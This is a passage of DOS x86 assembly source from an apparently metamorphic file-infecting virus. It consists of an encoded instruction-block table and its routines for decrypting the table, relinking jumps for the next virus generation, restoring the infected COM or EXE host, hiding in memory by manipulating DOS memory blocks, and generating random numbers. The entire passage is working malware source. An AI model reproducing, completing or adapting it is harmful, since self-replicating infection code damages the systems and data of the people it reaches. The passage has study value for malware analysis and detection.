instruction mov bp,[bp+1234h] ; BP = probability db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd5h ; Pointer to rnd_in_rang db 02h ; Two bytes instruction or ax,ax ; Split up block? db 01h ; One byte instruction pop bp ; Load BP from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 01110100b+10000000b ; Zero? Jump to split_bloc_ dw 0bc8h ; Pointer to split_bloc_ db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc2h ; Pointer to exam_bl__ db 11101111b ; End of block exam_bl__ db 11101110b ; Beginning of block dw 0bc2h ; Block identification of exam_bl__ db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01110100b+10000000b ; Equal? Jump to end_of_bloc dw 0bc9h ; Pointer to end_of_bloc db 02h ; Two bytes instruction cmp al,11101000b ; CALL; JMP; Data reference; Jcc? db 01110011b+10000000b ; Above or equal? Jump to exam_data_ dw 0bc4h ; Pointer to exam_data_ db 02h ; Two bytes instruction cmp al,10h ; Data? db 01110110b+10000000b ; Below or equal? Jump to sto_instruc dw 0bc3h ; Pointer to sto_instruc db 02h ; Two bytes instruction sub al,10h ; AL = length of data db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc3h ; Pointer to sto_instruc db 11101111b ; End of block sto_instruc db 11101110b ; Beginning of block dw 0bc3h ; Block identification of sto_instruc db 02h ; Two bytes instruction xor cx,cx ; Zero CX db 02h ; Two bytes instruction mov cl,al ; CL = length of instruction db 01h ; One byte instruction push di ; Save DI at stack db 02h ; Two bytes instruction mov di,bx ; DI = offset within next virus ge... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0beah ; Pointer to sto_ins_loo db 11101111b ; End of block sto_ins_loo db 11101110b ; Beginning of block dw 0beah ; Block identification of sto_ins_loo db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 01h ; One byte instruction stosb ; Store byte of instruction db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to sto_ins_loo dw 0beah ; Pointer to sto_ins_loo db 02h ; Two bytes instruction mov bx,di ; BX = offset within next virus ge... db 01h ; One byte instruction pop di ; Load DI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block exam_data_ db 11101110b ; Beginning of block dw 0bc4h ; Block identification of exam_data_ db 02h ; Two bytes instruction cmp al,11101101b ; Data reference? db 01110101b+10000000b ; Not equal? Jump to exam_bl___ dw 0bc5h ; Pointer to exam_bl___ db 01h ; One byte instruction push di ; Load DI from stack db 05h ; Five bytes instruction mov di,es:[08h] ; DI = offset within data information db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 01h ; One byte instruction stosw ; Store offset within next virus g... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be1h ; Pointer to decrypt_id_ db 01h ; One byte instruction stosw ; Store block identification db 05h ; Five bytes instruction mov es:[08h],di ; Store offset within data informa... db 01h ; One byte instruction pop di ; Load DI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block exam_bl___ db 11101110b ; Beginning of block dw 0bc5h ; Block identification of exam_bl___ db 02h ; Two bytes instruction cmp al,11101110b ; Beginning of block? db 01110101b+10000000b ; Not equal? Jump to sto_call_jm_ dw 0bc7h ; Pointer to sto_call_jm_ db 01h ; One byte instruction push di ; Save DI at stack db 05h ; Five bytes instruction mov di,es:[04h] ; DI = offset within block informa... db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction stosw ; Store offset within next virus ge... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be1h ; Pointer to decrypt_id_ db 01h ; One byte instruction stosw ; Store block identification db 05h ; Five bytes instruction mov es:[04h],di ; Store offset within block inform... db 03h ; Three bytes instruction cmp ax,4c5h ; Block identification of tmc_table_? db 01110101b+10000000b ; Not equal? Jump to exam_messag dw 0bc6h ; Pointer to exam_messag db 01h ; One byte instruction push si ; Save SI at stack db 02h ; Two bytes instruction mov di,bx ; DI = offset within next virus ge... db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of tmc_table_ db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 03h ; Three bytes instruction mov cx,(table_end-table_begin) db 02h ; Two bytes instruction rep movsb ; Move table to top of memory db 02h ; Two bytes instruction mov bx,di ; BX = offset within next virus ge... db 01h ; One byte instruction pop si ; Load SI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bebh ; Pointer to examine_nex db 11101111b ; End of block exam_messag db 11101110b ; Beginning of block dw 0bc6h ; Block identification of exam_messag db 03h ; Three bytes instruction cmp ax,2328h ; Block identification of message? db 01110101b+10000000b ; Not equal? Jump to exam_probab dw 0bedh ; Pointer to exam_probab db 03h ; Three bytes instruction mov ax,14h ; Probability of including message db 04h ; Four bytes instruction cmp [bp+1234h],ax ; Include message? db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 01110011b+10000000b ; Above or equal? Jump to examine_... dw 0bebh ; Pointer to examine_nex db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction sub al,10h ; AL = length of message db 02h ; Two bytes instruction mov ah,00h ; Zero AH db 02h ; Two bytes instruction add si,ax ; SI = offset of end of message db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bebh ; Pointer to examine_nex db 11101111b ; End of block exam_probab db 11101110b ; Beginning of block dw 0bedh ; Block identification of exam_probab db 03h ; Three bytes instruction cmp ax,0bech ; Block identification of probabi...? db 01110101b+10000000b ; Not equal? Jump to examine_nex dw 0bebh ; Pointer to examine_nex db 04h ; Four bytes instruction mov ax,[bp+1234h] ; AX = probability_ db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 01h ; One byte instruction dec ax ; Decrease probability db 03h ; Three bytes instruction cmp ax,05h ; Probability too small? db 01110011b+10000000b ; Above or equal? Jump to store_pr... dw 0bf5h ; Pointer to store_proba db 03h ; Three bytes instruction mov ax,64h ; Reset probability db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bf5h ; Pointer to store_proba db 11101111b ; End of block store_proba db 11101110b ; Beginning of block dw 0bf5h ; Block identification of store_proba db 03h ; Three bytes instruction mov es:[bx],ax ; Store probability db 03h ; Three bytes instruction add bx,02h ; Add two to offset within next vi... db 03h ; Three bytes instruction add si,03h ; SI = offset of beginning of next... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bebh ; Pointer to examine_nex db 11101111b ; End of block examine_nex db 11101110b ; Beginning of block dw 0bebh ; Block identification of examine_nex db 01h ; One byte instruction pop di ; Load DI from stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc2h ; Pointer to exam_bl__ db 11101111b ; End of block sto_call_jm_ db 11101110b ; Beginning of block dw 0bc7h ; Block identification of sto_call... db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push di ; Save DI at stack db 05h ; Five bytes instruction mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction stosw ; Store offset within next virus g... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be1h ; Pointer to decrypt_id_ db 01h ; One byte instruction stosw ; Store block identification db 05h ; Five bytes instruction mov es:[06h],di ; Store offset within CALL; JMP; J... db 01h ; One byte instruction pop di ; Load DI from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 03h ; Three bytes instruction mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... db 03h ; Three bytes instruction add bx,03h ; Add three to offset within next ... db 02h ; Two bytes instruction cmp al,11110000b ; Jump condition? db 01110010b+10000000b ; Below? Jump to exam_bl_ dw 0bc1h ; Pointer to exam_bl_ db 01h ; One byte instruction inc bx ; Increase offset within next viru... db 01h ; One byte instruction inc bx ; Increase offset within next viru... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block split_bloc_ db 11101110b ; Beginning of block dw 0bc8h ; Block identification of split_bloc_ db 04h ; Four bytes instruction mov es:[di+02h],bx ; Store offset within next virus g... db 03h ; Three bytes instruction add bx,03h ; Add three to offset within next ... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc9h ; Pointer to end_of_bloc db 11101111b ; End of block end_of_bloc db 11101110b ; Beginning of block dw 0bc9h ; Block identification of end_of_bloc db 01h ; One byte instruction dec si ; Decrease offset of block within ... db 03h ; Three bytes instruction mov es:[di],si ; Store offset of block within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bbdh ; Pointer to of split_bloc db 11101111b ; End of block exam_tbl_in db 11101110b ; Beginning of block dw 0bcah ; Block identification of exam_tbl_in db 06h ; Six bytes instruction cmp word ptr es:[0ch],00h db 01110101b+10000000b ; End of second table? Jump to cor... dw 0fa1h ; Pointer to correc_i16 db 01h ; One byte instruction pop si ; Load SI from stack db 05h ; Five bytes instruction mov es:[0ch],bx ; Store offset within next virus g... db 04h ; Four bytes instruction add si,(second_table-first_table) db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fa0h ; Pointer to initial_tmc db 11101111b ; End of block correc_i16 db 11101110b ; Beginning of block dw 0fa1h ; Block identification of correc_i16 db 01h ; One byte instruction push es ; Save ES at stack db 01h ; One byte instruction pop ds ; Load DS from stack (ES) db 04h ; Four bytes instruction sub bx,730h ; Subtract offset of next virus ge... db 04h ; Four bytes instruction mov ds:[0eh],bx ; Store length of virus db 03h ; Three bytes instruction mov si,2c8h ; SI = offset of CALL; JMP; Jcc im... db 04h ; Four bytes instruction mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of CALL; JMP; Jc... db 02h ; Two bytes instruction shr cx,01h ; Divide number of CALL imm16; JMP... db 02h ; Two bytes instruction shr cx,01h ; Divide number of CALL imm16; JMP... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcbh ; Pointer to jmp_call_lo db 11101111b ; End of block jmp_call_lo db 11101110b ; Beginning of block dw 0bcbh ; Block identification of jmp_call_lo db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push cx ; Save CX at stack db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov si,118h ; SI = offset of block information db 04h ; Four bytes instruction mov cx,ds:[04h] ; CX = offset of end of block info... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of block informa... db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcch ; Pointer to find_block__ db 11101111b ; End of block find_block__ db 11101110b ; Beginning of block dw 0bcch ; Block identification of find_blo... db 03h ; Three bytes instruction cmp ax,[si+02h] ; Found block? db 01110100b+10000000b ; Equal? Jump to found_bloc dw 0bcdh ; Pointer to found_bloc db 03h ; Three bytes instruction add si,04h ; SI = offset of next block in table db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to find_block__ dw 0bcch ; Pointer to find_block__ db 11101111b ; End of block found_bloc db 11101110b ; Beginning of block dw 0bcdh ; Block identification of found_bloc db 02h ; Two bytes instruction mov dx,[si] ; DX = offset of block db 01h ; One byte instruction pop si ; Load SI from stack db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction pop bx ; Load BX from stack (AX) db 02h ; Two bytes instruction mov al,[bx] ; AL = first byte of instruction db 02h ; Two bytes instruction cmp al,11110000b ; Jump condition? db 01110010b+10000000b ; Below? Jump to sto_call_j dw 0bcfh ; Pointer to sto_call_j db 03h ; Three bytes instruction sub byte ptr [bx],10000000b db 01h ; One byte instruction inc bx ; BX = offset of 8-bit immediate db 01h ; One byte instruction push dx ; Save DX at stack db 02h ; Two bytes instruction sub dx,bx ; Subtract offset within next viru... db 01h ; One byte instruction dec dx ; Decrease 8-bit immediate db 03h ; Three bytes instruction cmp dx,7fh ; 8-bit immediate out of range? db 01111111b+10000000b ; Greater? Jump to invert_jcc_ dw 0bceh ; Pointer to invert_jcc_ db 03h ; Three bytes instruction cmp dx,0ff80h ; 8-bit immediate out of range? db 01111100b+10000000b ; Less? Jump to invert_jcc_ dw 0bceh ; Pointer to invert_jcc_ db 02h ; Two bytes instruction mov [bx],dl ; Store 8-bit immediate db 01h ; One byte instruction inc bx ; BX = offset of end of Jcc imm8 db 04h ; Four bytes instruction mov [bx],1001000010010000b db 04h ; Four bytes instruction mov byte ptr [bx+02h],10010000b db 01h ; One byte instruction pop dx ; Load DX from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd0h ; Pointer to correc_i16_ db 11101111b ; End of block invert_jcc_ db 11101110b ; Beginning of block dw 0bceh ; Block identification of invert_jcc_ db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction dec bx ; BX = offset of Jcc imm8 db 03h ; Three bytes instruction xor byte ptr [bx],00000001b db 01h ; One byte instruction inc bx ; BX = offset of 8-bit immediate db 03h ; Three bytes instruction mov byte ptr [bx],03h ; Store 8-bit immediate db 01h ; One byte instruction inc bx ; BX = offset of JMP imm16 db 02h ; Two bytes instruction mov al,11101001b ; JMP imm16 (opcode 0e9h) db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcfh ; Pointer to sto_call_j db 11101111b ; End of block sto_call_j db 11101110b ; Beginning of block dw 0bcfh ; Block identification of sto_call_j db 02h ; Two bytes instruction mov [bx],al ; Store CALL imm16; JMP imm16 db 01h ; One byte instruction inc bx ; BX = offset of 16-bit immediate db 02h ; Two bytes instruction sub dx,bx ; Subtract offset within next viru... db 01h ; One byte instruction dec dx ; Decrease 16-bit immediate db 01h ; One byte instruction dec dx ; Decrease 16-bit immediate db 02h ; Two bytes instruction mov [bx],dx ; Store 16-bit immediate db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd0h ; Pointer to correc_i16_ db 11101111b ; End of block correc_i16_ db 11101110b ; Beginning of block dw 0bd0h ; Block identification of correc_16_ db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to jmp_call_lo dw 0bcbh ; Pointer to jmp_call_lo db 03h ; Three bytes instruction mov si,5a8h ; SI = offset of data information db 04h ; Four bytes instruction mov cx,ds:[08h] ; CX = offset of end of data infor... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of data informat... db 02h ; Two bytes instruction shr cx,01h ; Divide number of data references... db 02h ; Two bytes instruction shr cx,01h ; Divide number of data references... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd1h ; Pointer to data_ref_lo db 11101111b ; End of block data_ref_lo db 11101110b ; Beginning of block dw 0bd1h ; Block identification of data_ref_lo db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push cx ; Save CX at stack db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov si,118h ; SI = offset of block information db 04h ; Four bytes instruction mov cx,ds:[04h] ; CX = offset of end of block info... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of block informa... db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd2h ; Pointer to find_bloc db 11101111b ; End of block find_bloc db 11101110b ; Beginning of block dw 0bd2h ; Block identification to find_bloc db 03h ; Three bytes instruction cmp ax,[si+02h] ; Found block? db 01110100b+10000000b ; Equal? Jump to found_bloc_ dw 0bd3h ; Pointer to found_bloc_ db 03h ; Three bytes instruction add si,04h ; SI = offset of next block in table db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to find_bloc dw 0bd2h ; Pointer to find_bloc db 11101111b ; End of block found_bloc_ db 11101110b ; Beginning of block dw 0bd3h ; Block identification of found_bloc_ db 02h ; Two bytes instruction mov ax,[si] ; AX = offset of block db 01h ; One byte instruction pop si ; Load SI from stack db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction pop bx ; Load BX from stack (AX) db 03h ; Three bytes instruction sub ax,730h ; Subtract offset of next virus ge... db 02h ; Two bytes instruction mov [bx],ax ; Store 16-bit immediate db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to data_ref_lo dw 0bd1h ; Pointer to data_ref_lo db 11101001b ; JMP imm16 (opcode 0e9h) dw 1772h ; Pointer to restore_cod db 11101111b ; End of block restore_cod db 11101110b ; Beginning of block dw 1772h ; Block identification of restore_cod db 04h ; Four bytes instruction mov ax,[bp+1234h] ; AX = segment of PSP for current ... db 11101101b ; Data reference dw 0befh ; Pointer to program_seg_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial SS relative to star... db 11101101b ; Data reference dw 138ah ; Pointer to initial_ss_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial SS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... db 01h ; One byte instruction push cx ; Save CX at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save initial SP at stack db 11101101b ; Data reference dw 138ch ; Pointer to initial_sp_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial CS relative to star... db 11101101b ; Data reference dw 1389h ; Pointer to initial_cs_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial CS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... db 01h ; One byte instruction push cx ; Save CX at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save initial IP at stack db 11101101b ; Data reference dw 138bh ; Pointer to initial_ip_ db 01h ; One byte instruction push ax ; Save segment of PSP for current ... db 04h ; Four bytes instruction push [bp+1234h] ; Save size of memory block in par... db 11101101b ; Data reference dw 1395h ; Pointer to mcb_size__ db 01h ; One byte instruction push ds ; Save DS at stack db 02h ; Two bytes instruction mov cl,00h ; COM executable db 04h ; Four bytes instruction cmp [bp+1234h],cl ; COM executable? db 11101101b ; Data reference dw 1388h ; Pointer to executa_sta db 01110101b+10000000b ; Not equal? Jump to move_virus__ dw 1390h ; Pointer to move_virus__ db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of origin_code_ db 11101101b ; Data reference dw 1f40h ; Pointer to origin_code_ db 03h ; Three bytes instruction mov ax,cs:[si] ; AX = first two bytes of original... db 04h ; Four bytes instruction mov cs:[100h],ax ; Store first two bytes of origina... db 04h ; Four bytes instruction mov al,cs:[si+02h] ; AL = last byte of original code ... db 04h ; Four bytes instruction mov cs:[100h+02h],al ; Store last byte of original code... db 11101001b ; JMP imm16 (opcode 0e9h) dw 1390h ; Pointer to move_virus__ db 11101111b ; End of block db 11101110b ; Beginning of block dw 1774h db 04h ; Four bytes instruction mov ax,[bp+1234h] ; AX = segment of PSP for current ... db 11101101b ; Data reference dw 0befh ; Pointer to program_seg_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial SS relative to star... db 11101101b ; Data reference dw 138ah ; Pointer to initial_ss_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial SS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... db 01h ; One byte instruction push cx ; Save CX at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save initial SP at stack db 11101101b ; Data reference dw 138ch ; Pointer to initial_sp_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial CS relative to star... db 11101101b ; Data reference dw 1389h ; Pointer to initial_cs_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial CS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... db 01h ; One byte instruction push cx ; Save CX at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save incorrect IP at stack db 11101101b ; Data reference dw 1773h ; Pointer to incorrec_ip db 01h ; One byte instruction push ax ; Save segment of PSP for current ... db 04h ; Four bytes instruction push [bp+1234h] ; Save size of memory block in par... db 11101101b ; Data reference dw 1395h ; Pointer to mcb_size__ db 01h ; One byte instruction push ds ; Save DS at stack db 02h ; Two bytes instruction mov cl,00h ; COM executable db 04h ; Four bytes instruction cmp [bp+1234h],cl ; COM executable? db 11101101b ; Data reference dw 1388h ; Pointer to executa_sta db 01110101b+10000000b ; Not equal? Jump to move_virus__ dw 1390h ; Pointer to move_virus__ db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of incorr_code_ db 11101101b ; Data reference dw 1776h ; Pointer to incorr_code_ db 03h ; Three bytes instruction mov ax,cs:[si] ; AX = first two bytes of incorrec... db 04h ; Four bytes instruction mov cs:[100h],ax ; Store first two bytes of incorre... db 04h ; Four bytes instruction mov al,cs:[si+02h] ; AL = last byte of incorrect code db 04h ; Four bytes instruction mov cs:[100h+02h],al ; Store last byte of incorrect code db 11101001b ; JMP imm16 (opcode 0e9h) dw 1390h ; Pointer to move_virus__ db 11101111b ; End of block move_virus__ db 11101110b ; Beginning of block dw 1390h ; Block identification of move_vir... db 02h ; Two bytes instruction xor ax,ax ; Zero AX db 02h ; Two bytes instruction mov ds,ax ; DS = segment of DOS communicatio... db 05h ; Five bytes instruction cmp byte ptr ds:[501h],10h db 01110100b+10000000b ; Already resident? Jump to virus_... dw 65h ; Pointer to virus_exit_ db 05h ; Five bytes instruction mov byte ptr ds:[501h],10h db 01h ; One byte instruction push es ; Save ES at stack db 01h ; One byte instruction pop ds ; Load DS from stack (ES) db 03h ; Three bytes instruction mov ax,ds:[0ch] ; AX = offset within next virus ge... db 03h ; Three bytes instruction sub ax,730h ; Subtract offset of next virus ge... db 04h ; Four bytes instruction mov [bp+1234h],ax ; Store offset of virus_exit db 11101101b ; Data reference dw 0bf1h ; Pointer to vir_exit_of db 04h ; Four bytes instruction mov cx,ds:[0eh] ; CX = length of virus db 04h ; Four bytes instruction mov [bp+1234h],cx ; Store length of virus db 11101101b ; Data reference dw 0bf0h ; Pointer to virus_lengt db 03h ; Three bytes instruction mov si,730h ; SI = offset of next virus genera... db 02h ; Two bytes instruction xor di,di ; Zero DI db 02h ; Two bytes instruction rep movsb ; Move virus to top of memory db 02h ; Two bytes instruction mov cl,04h ; Divide by paragraphs db 02h ; Two bytes instruction shr di,cl ; DI = length of next virus genera... db 01h ; One byte instruction inc di ; Increase length of next virus ge... db 04h ; Four bytes instruction mov bx,[bp+1234h] ; BX = size of memory block in par... db 11101101b ; Data reference dw 1394h ; Pointer to mcb_size___ db 04h ; Four bytes instruction sub bx,[bp+1234h] ; Subtract new size in paragraphs ... db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 02h ; Two bytes instruction sub bx,di ; Subtract length of next virus ge... db 01h ; One byte instruction dec bx ; Decrease new size in paragraphs db 01h ; One byte instruction dec bx ; Decrease new size in paragraphs db 02h ; Two bytes instruction cmp bx,di ; Insufficient memory? db 01110010b+10000000b ; Below? Jump to virus_exit_ dw 65h ; Pointer to virus_exit_ db 02h ; Two bytes instruction mov ah,4ah ; Resize memory block db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to virus_exit_ dw 65h ; Pointer to virus_exit_ db 02h ; Two bytes instruction mov bx,di ; BX = number of paragraphs to all... db 02h ; Two bytes instruction mov ah,48h ; Allocate memory db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to virus_exit_ dw 65h ; Pointer to virus_exit_ db 01h ; One byte instruction dec ax ; AX = segment of current Memory C... db 02h ; Two bytes instruction mov es,ax ; ES = segment of current Memory C... db 07h ; Seven bytes instruction mov word ptr es:[01h],08h db 01h ; One byte instruction inc ax ; AX = segment of PSP for current ... db 02h ; Two bytes instruction mov es,ax ; AX = segment of PSP for current ... db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = length of virus db 11101101b ; Data reference dw 0bf0h ; Pointer to virus_lengt db 02h ; Two bytes instruction xor si,si ; Zero SI db 02h ; Two bytes instruction xor di,di ; Zero DI db 02h ; Two bytes instruction rep movsb ; Move virus to top of memory db 01h ; One byte instruction push es ; Save ES at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save offset of virus_exit_ at stack db 11101101b ; Data reference dw 0bf1h ; Pointer to vir_exit_of db 04h ; Four bytes instruction mov al,[bp+1234h] ; AL = 8-bit encryption/decryption... db 11101101b ; Data reference dw 0bd7h ; Pointer to crypt_key_ db 04h ; Four bytes instruction mov ah,[bp+1234h] ; AH = 8-bit sliding encryption/de... db 11101101b ; Data reference dw 0bd8h ; Pointer to sliding_key_ db 01h ; One byte instruction retf ; Return far db 11101111b ; End of block terminate_ db 11101110b ; Beginning of block dw 0beeh ; Block identification of terminate_ db 03h ; Three bytes instruction mov ax,4c00h ; Terminate with return code db 02h ; Two bytes instruction int 21h db 11101111b ; End of block get_rnd_num_ db 11101110b ; Beginning of block dw 0bd4h ; Block identification of get_rnd_... db 01h ; One byte instruction push cx ; Save CX at stack db 02h ; Two bytes instruction in al,40h ; AL = 8-bit random number db 02h ; Two bytes instruction mov ah,al ; AH = 8-bit random number db 02h ; Two bytes instruction in al,40h ; AL = 8-bit random number db 05h ; Five bytes instruction xor ax,es:[02h] ; AX = 16-bit random number db 02h ; Two bytes instruction mov cl,ah ; CL = high-order byte of 16-bit r... db 02h ; Two bytes instruction rol ax,cl ; AX = 16-bit random number db 04h ; Four bytes instruction mov es:[02h],ax ; Store 16-bit random number db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction ret ; Return db 11101111b ; End of block rnd_in_rang db 11101110b ; Beginning of block dw 0bd5h ; Block identification of rnd_in_rang db 02h ; Two bytes instruction or bp,bp ; Zero BP? db 01110100b+10000000b ; Zero? Jump to zero_range_ dw 0bd6h ; Pointer to zero_range_ db 01h ; One byte instruction push dx ; Save DX at stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd4h ; Pointer to get_rnd_num_ db 02h ; Two bytes instruction xor dx,dx ; Zero DX db 02h ; Two bytes instruction div bp ; DX = random number within range db 01h ; One byte instruction xchg ax,dx ; AX = random number within range db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction ret ; Return db 11101111b ; End of block zero_range_ db 11101110b ; Beginning of block dw 0bd6h ; Block identification of zero_range_ db 02h ; Two bytes instruction xor ax,ax ; AX = random number within range db 01h ; One byte instruction ret ; Return db 11101111b ; End of block decrypt_byt db 11101110b ; Beginning of block dw 0be0h ; Block identification of decrypt_byt db 04h ; Four bytes instruction mov [bp+1234h],ah ; Store AH db 11101101b ; Data reference dw 0bd9h ; Pointer to ah__ db 02h ; Two bytes instruction mov ax,si ; AX = offset within table db 02h ; Two bytes instruction sub ax,bp ; Subtract delta offset from offse... db 03h ; Three bytes instruction sub ax,1234h ; Subtract offset of tmc_table_ fr... db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 04h ; Four bytes instruction mul word ptr [bp+1234h] ; AL = 8-bit sliding encryption/de... db 11101101b ; Data reference dw 0bd8h ; Pointer to sliding_key_ db 04h ; Four bytes instruction add al,[bp+1234h] ; AL = 8-bit encryption/decryption... db 11101101b ; Data reference dw 0bd7h ; Pointer to crypt_key_ db 02h ; Two bytes instruction xor al,[si] ; AL = byte of decrypted table db 04h ; Four bytes instruction mov ah,[bp+1234h] ; AH = stored AH db 11101101b ; Data reference dw 0bd9h ; Pointer to ah__ db 01h ; One byte instruction inc si ; Increase offset within table db 01h ; One byte instruction ret ; Return db 11101111b ; End of block decrypt_id_ db 11101110b ; Beginning of block dw 0be1h ; Block identification of decrypt_id_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction mov ah,al ; AL = byte of decrypted table db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction xchg al,ah ; AL = byte of decrypted table db 01h ; One byte instruction ret ; Return db 11101111b ; End of block virus_exit_ db 11101110b ; Beginning of block dw 65h ; Block identification of virus_exit_ db 01h ; One byte instruction pop es ; Load ES from stack db 02h ; Two bytes instruction mov ah,49h ; Free memory db 02h ; Two bytes instruction int 21h db 01h ; One byte instruction pop bx ; Load BX from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 02h ; Two bytes instruction mov ds,ax ; DS = segment of PSP for current ... db 02h ; Two bytes instruction mov es,ax ; DS = segment of PSP for current ... db 02h ; Two bytes instruction mov ah,4ah ; Resize memory block db 02h ; Two bytes instruction int 21h db 04h ; Four bytes instruction lea bx,[bp+1234h] ; BX = offset of jmp_imm32_ db 11101101b ; Data reference dw 1391h ; Pointer of jmp_imm32_ db 01h ; One byte instruction pop ax ; Load AX from stack (initial IP) db 04h ; Four bytes instruction mov cs:[bx+01h],ax ; Store initial IP db 01h ; One byte instruction pop ax ; Load AX from stack (initial CS ...) db 04h ; Four bytes instruction mov cs:[bx+03h],ax ; Store initial CS relative to sta... db 01h ; One byte instruction pop ax ; Load AX from stack (initial SP) db 01h ; One byte instruction pop ss ; Load SS from stack (initial SS ...) db 02h ; Two bytes instruction mov sp,ax ; SP = stack pointer db 11101001b ; JMP imm16 (opcode 0e9h) dw 1391h ; Pointer of jmp_imm32_ db 11101111b ; End of block jmp_imm32_ db 11101110b ; Beginning of block dw 1391h ; Block identification of 